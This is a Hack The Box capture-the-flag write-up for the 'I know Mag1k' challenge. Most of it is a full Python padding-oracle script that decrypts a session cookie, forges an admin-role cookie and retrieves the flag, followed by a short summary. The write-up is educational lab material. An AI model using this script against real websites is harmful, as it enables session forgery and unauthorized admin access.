
HackTheBox I know Mag1k Writeup

Explore the basics of cybersecurity in the I know Mag1k challenge on Hack The Box. This easy-level challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/10

Description

Can you get to the profile page of the admin?

Exploitation

#!/usr/bin/env python3
import requests
from pwn import b64d, b64e, log, re, sys, xor
from urllib.parse import quote, unquote

def oracle(cookie: str) -> bool:
    """Return True when the server accepts *cookie* as a well-padded ciphertext.

    The script treats an HTTP 500 from ``profile.php`` as "padding rejected"
    and any other status as "padding accepted", so each request leaks one bit
    about the decrypted cookie.  That distinguishable failure is the whole
    vulnerability: a server answering identically for a padding error and for
    a well-padded but otherwise bad cookie, or one using authenticated
    encryption (AES-GCM, encrypt-then-MAC) so tampered cookies are rejected
    before decryption, would give this function nothing to work with.

    Reads the module-level ``url`` and ``phpsessid`` assigned by ``main``.
    """
    jar = {'PHPSESSID': phpsessid, 'iknowmag1k': cookie}
    resp = requests.get(f'{url}/profile.php', cookies=jar)
    return resp.status_code != 500

def decrypt_block(ct_block: bytes, poa) -> bytes:
    """Recover the intermediate state (raw block decryption) of one 8-byte block.

    Textbook padding-oracle recovery, last byte first.  For position ``7 - i``
    a forged "previous" block is assembled from zero bytes, one guessed byte
    and the tail already solved (re-masked so it decrypts to the padding value
    ``i + 1``); ``oracle`` reports whether the server accepted the padding, and
    the accepted guess XOR ``i + 1`` is the intermediate byte.  Up to 8 * 256
    requests per block.  ``poa`` is a pwnlib progress logger updated with the
    count of solved bytes.

    Returns the 8 intermediate bytes; the caller XORs them with the genuine
    preceding block to obtain plaintext.  A position for which no guess is
    accepted stays 0 and the solved tail is not extended, exactly as in the
    original.  A server that never leaks padding validity (uniform error
    responses, authenticated encryption) makes every request fail alike and
    nothing is recovered.
    """
    intermediate = [0] * 8
    tail = []  # solved tail bytes, masked for the current padding value
    poa.status('0 / 8')
    for i in range(8):
        pad = i + 1
        prefix = [0] * (7 - i)
        for guess in range(256):
            forged = bytes(prefix + [guess] + tail)
            if not oracle(quote(b64e(forged + ct_block))):
                continue
            poa.status(f'{pad} / 8')
            intermediate[7 - i] = guess ^ pad
            # Re-mask the solved tail so it decrypts to pad + 1 next round.
            tail = [(pad + 1) ^ intermediate[7 - j] for j in range(pad)][::-1]
            break
    return bytes(intermediate)

def main() -> None:
    """Drive the padding-oracle attack end to end against ``sys.argv[1]``.

    Steps, as written: register and log in as a throwaway account so the
    server issues a session and an ``iknowmag1k`` cookie; base64-decode the
    cookie and split it into 8-byte blocks; recover each block's plaintext
    from the back (``decrypt_block`` yields the intermediate state, XOR with
    the preceding ciphertext block yields plaintext, the first block serving
    only as that mask); then forge ciphertext for ``want`` by working
    backwards from an all-zero trailing block; finally request
    ``profile.php`` with the forged cookie and grep for the flag pattern.

    Sets the module globals ``url`` and ``phpsessid`` that ``oracle`` reads.
    Every oracle query is its own HTTP request, so a full run issues on the
    order of blocks * 8 * 256 requests from one session to one path, most of
    them failing — a pattern that is easy to spot in server-side logs.
    """
    global url
    global phpsessid
    if len(sys.argv) != 2:
        print(f'Usage: python {sys.argv[0]} <host:port>')
        # NOTE: this is the builtin exit(); sys.exit(1) is the conventional form.
        exit(1)
    url = f'http://{sys.argv[1]}'
    # Register and log in as a throwaway account so the server hands out the
    # cookie under attack.  Credentials are fixed; whether a repeat run copes
    # with an already-registered name depends on the server — not verified.
    s = requests.session()
    s.post(f'{url}/register.php', data={
        'username': 'a',
        'email': 'a@a.com',
        'password': 'a1b2c3d4',
        'confirm': 'a1b2c3d4'
    })
    s.post(f'{url}/login.php', data={
        'username': 'a',
        'password': 'a1b2c3d4',
    })
    phpsessid = s.cookies['PHPSESSID']
    iknowmag1k = s.cookies['iknowmag1k']
    log.info(f'PHPSESSID: {phpsessid}')
    log.info(f'iknowmag1k: {iknowmag1k}')
    # The cookie is URL-encoded base64; undo both to get raw ciphertext bytes.
    iknowmag1k = b64d(unquote(iknowmag1k))
    # The 8-byte block size is a fixed assumption of this script.
    blocks = [iknowmag1k[i:i + 8] for i in range(0, len(iknowmag1k), 8)]
    plaintext = b''
    dec_prog = log.progress('Decrypted')
    enc_prog = log.progress('Encrypted')
    poa = log.progress('Bytes')
    # Decrypt from the last block backwards.  A block's intermediate state XOR
    # the preceding ciphertext block is its plaintext, so blocks[0] is only
    # ever used as a mask and is never decrypted itself.
    for m in range(len(blocks) - 1):
        current_block = blocks[-1 - m]
        prev_block = blocks[-2 - m]
        dec = decrypt_block(current_block, poa)
        plaintext = xor(dec, prev_block) + plaintext
        dec_prog.status(str(plaintext))
    dec_prog.success(str(plaintext))
    # Target plaintext with its padding bytes written out by hand.
    want = b'{"user":"a","role":"admin"}\x02\x02'
    # Forge backwards from an all-zero trailing block: each round learns the
    # intermediate state of the current leading block, and intermediate XOR
    # wanted plaintext becomes the block placed in front of it.
    ct = b'\0' * 8
    encrypted = b''
    while want:
        block, want = want[-8:], want[:-8]
        dec = decrypt_block(ct[:8], poa)
        ct = xor(bytes(dec), block) + ct
        # Sanity check that the partial forgery still passes the padding check.
        # NOTE: assert is stripped under python -O, so this is debug-only.
        assert oracle(quote(b64e(ct)))
        encrypted = block + encrypted
        enc_prog.status(str(encrypted))
    cookie = quote(b64e(ct))
    poa.success()
    enc_prog.success(cookie)
    r = requests.get(f'{url}/profile.php', cookies={
        'PHPSESSID': phpsessid,
        'iknowmag1k': cookie
    })
    # findall(...)[0] raises IndexError when the response holds no flag.
    log.success('Flag: ' + re.findall(r'HTB\{.*?\}', r.text)[0])

# Script entry point; main() reads the target host:port from argv.
if __name__ == '__main__':
    main()

Summary

The I Know Mag1k Challenge on Hack The Box is an easy-level challenge involving session cookie manipulation and encryption reversal. The goal is to craft a valid admin session by decrypting the iknowmag1k cookie and modifying it. By using an oracle function to test for valid cookies and leveraging XOR operations, participants can decrypt the cookie, revealing the necessary information to access the admin profile page. This challenge introduces important concepts in web security, including session management and cryptographic attacks.

This post is licensed under CC BY 4.0 by the author.